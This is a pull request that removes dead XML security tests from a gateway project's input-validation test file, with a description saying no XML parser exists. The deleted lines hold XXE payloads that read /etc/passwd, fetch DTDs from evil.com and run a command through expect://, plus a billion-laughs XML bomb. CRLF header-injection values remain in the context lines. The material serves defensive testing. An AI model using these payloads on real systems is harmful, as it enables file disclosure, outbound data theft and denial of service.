### PR TITLE
chore: remove dead XML validation test surface

### DIFF
--- a/tests/security/test_input_validation.py
+++ b/tests/security/test_input_validation.py
@@ -134,15 +134,6 @@ class TestSecurityValidation:
         "*))%00",
     ]
 
-    # XXE Injection Vectors
-    XXE_PAYLOADS = [
-        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
-        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://evil.com/xxe">]><foo>&xxe;</foo>',
-        '<!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "expect://id">]><foo>&xxe;</foo>',
-        '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://evil.com/xxe.dtd">%xxe;]><foo/>',
-        '<?xml version="1.0"?><!DOCTYPE foo SYSTEM "http://evil.com/xxe.dtd"><foo/>',
-    ]
-
     # CRLF Injection Vectors
     CRLF_INJECTION_PAYLOADS = [
         "value\r\nSet-Cookie: admin=true",
@@ -1277,35 +1268,6 @@ class TestSecurityValidation:
                 logger.debug(f"  Payload {i + 1} accepted (no dangerous pattern matched)")
             except ValidationError:
                 logger.debug(f"  Payload {i + 1} rejected (validation failed)")
-
-    @pytest.mark.skip(reason="Currently not applicable, XML parsing not used")
-    def test_billion_laughs_attack(self):
-        """Test XML entity expansion attack prevention."""
-        logger.debug("Testing billion laughs attack")
-
-        # Helper function
-        def must_fail(content: str, mime: str, label: str = "XML bomb") -> None:
-            """Ensure that XML bomb content raises ValidationError."""
-            try:
-                ResourceCreate(uri="test.xml", name="XML Resource", content=content, mime_type=mime)
-            except ValidationError as err:
-                print(f"✅ {label} correctly rejected -> {err}")
-            else:
-                print(f"❌ {label} passed but should have failed")
-                pytest.fail(f"{label} accepted although it contains dangerous XML")
-
-        # This would be relevant if XML parsing is involved
-        xml_bomb = """<?xml version="1.0"?>
-        <!DOCTYPE lolz [
-        <!ENTITY lol "lol">
-        <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
-        <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
-        ]>
-        <lolz>&lol3;</lolz>"""
-
-        # Should be caught as dangerous content
-        logger.debug("Testing XML bomb in resource content")
-        must_fail(xml_bomb, "application/xml", "Billion laughs XML bomb")
 
     def test_prototype_pollution_prevention(self):
         """Test prevention of prototype pollution attacks."""


### PR DESCRIPTION
Closes #5833

## Investigation outcome

The issue asked to confirm whether an XML parsing path exists in the input-validation layer and remove it if dead. **No such code path exists.** Grep across `mcpgateway/validation/`, `mcpgateway/middleware/`, `mcpgateway/common/validators.py`, and `mcpgateway/schemas.py` finds no XML parsing branch:

- `application/xml` appears only as a content-type label in allowed-MIME config lists (`config.py`) — a string in a list, not a parser.
- `select_autoescape(["html", "xml"])` in `prompt_service.py` is Jinja2 *output* escaping for templates — live code, unrelated to input parsing.
- Billion-laughs / XXE are parser-level attacks; with no XML parser in the request path there is no attack surface, so there is nothing to un-skip or repair either (the issue's alternative branch).

The only dead surface was in the test file itself.

## Changes (`tests/security/test_input_validation.py`, -38 lines)

- Delete the skipped `test_billion_laughs_attack` (skip reason: "Currently not applicable, XML parsing not used") — it asserted XML bombs should be rejected by validation that does not exist.
- Delete the unused `XXE_PAYLOADS` class attribute — defined but never referenced by any test.

No production code or config knobs removed — none exist for XML parsing.

## Verification

- `make test`: 20867 passed, 798 skipped — the `test_input_validation.py:1281` skip entry is gone.
- `tests/security/test_input_validation.py`: 85 passed, 1 skipped (remaining skip is unrelated).
- `ruff check` on the file reports the identical pre-existing finding count before and after (111 → 111, all `logging-f-string` style findings throughout the file, untouched by this change).